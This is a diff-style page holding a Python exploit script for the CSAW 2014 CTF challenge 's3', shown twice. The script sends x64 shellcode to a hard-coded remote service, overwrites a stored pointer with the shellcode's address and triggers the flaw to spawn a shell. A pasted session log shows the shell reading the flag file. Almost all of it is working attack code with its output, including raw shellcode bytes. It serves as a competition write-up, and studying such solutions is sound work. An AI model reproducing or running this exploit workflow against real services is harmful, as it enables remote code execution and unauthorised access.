g05u · September 21, 2014 22:36
diff --git a/csaw_2014_s3.py b/csaw_2014_s3.py
 #!/usr/bin/env python
 import struct, sys, time
 from nulllife import *

 #CSAW 2014 CTF
 #s3 exploit

 s = NullSocket("54.165.225.121", 5333)

 s.readuntil("> ")
 print '[!] Setting shellcode'
 shellcode = NullShell('exec', arch='x64-86').get()
 print 'Shellcode: ' + shellcode.encode('hex')
 s.writeline("c 1 " + shellcode)
 s.readuntil("unique identifier is: ")
 addr_shellcode = int(s.readline()[:-1])
 s.readuntil("> ")
 print '[+] Shellcode address: 0x%08X' % addr_shellcode

 print '[!] Setting new counter string'
 s.writeline("c 1 AAAA")
 s.readuntil("unique identifier is: ")
 id = int(s.readline()[:-1])
 print '[!] id new string: %d' % id
 s.readuntil("> ")


 print '[!] Updating counter string id: %d' % id
 s.writeline("u %d %s" % (id, struct.pack("<Q", addr_shellcode)))
 s.readuntil("unique identifier is: ")
 id = int(s.readline()[:-1])
 print '[!] id new string: %d' % id
 s.readuntil("> ")

 print '[!] Trigger vuln'
 s.writeline("r %d" % id)
 print '[***] Got shell'
 s.interactive()

 '''
 $ python s3.py
 [!] Setting shellcode
 Shellcode: 4831c048bbd19d9691d08c97ff48f7db53545f50505e5ab03b0f05
 [+] Shellcode address: 0x01A27030
 [!] Setting new counter string
 [!] id new string: 27422992
 [!] Updating counter string id: 27422992
 [!] id new string: 27422848
 [!] Trigger vuln
 [***] Got shell
 id&&cat /home/amazon/flag
 uid=1001(amazon) gid=1001(amazon) groups=1001(amazon)
 flag{SimplyStupidStorage}
 exit
 *** Connection closed by remote host ***
 '''
	#!/usr/bin/env python
	import struct, sys, time
	from nulllife import *

	#CSAW 2014 CTF
	#s3 exploit

	s = NullSocket("54.165.225.121", 5333)

	s.readuntil("> ")
	print '[!] Setting shellcode'
	shellcode = NullShell('exec', arch='x64-86').get()
	print 'Shellcode: ' + shellcode.encode('hex')
	s.writeline("c 1 " + shellcode)
	s.readuntil("unique identifier is: ")
	addr_shellcode = int(s.readline()[:-1])
	s.readuntil("> ")
	print '[+] Shellcode address: 0x%08X' % addr_shellcode

	print '[!] Setting new counter string'
	s.writeline("c 1 AAAA")
	s.readuntil("unique identifier is: ")
	id = int(s.readline()[:-1])
	print '[!] id new string: %d' % id
	s.readuntil("> ")


	print '[!] Updating counter string id: %d' % id
	s.writeline("u %d %s" % (id, struct.pack("<Q", addr_shellcode)))
	s.readuntil("unique identifier is: ")
	id = int(s.readline()[:-1])
	print '[!] id new string: %d' % id
	s.readuntil("> ")

	print '[!] Trigger vuln'
	s.writeline("r %d" % id)
	print '[***] Got shell'
	s.interactive()

	'''
	$ python s3.py
	[!] Setting shellcode
	Shellcode: 4831c048bbd19d9691d08c97ff48f7db53545f50505e5ab03b0f05
	[+] Shellcode address: 0x01A27030
	[!] Setting new counter string
	[!] id new string: 27422992
	[!] Updating counter string id: 27422992
	[!] id new string: 27422848
	[!] Trigger vuln
	[***] Got shell
	id&&cat /home/amazon/flag
	uid=1001(amazon) gid=1001(amazon) groups=1001(amazon)
	flag{SimplyStupidStorage}
	exit
	* Connection closed by remote host *
	'''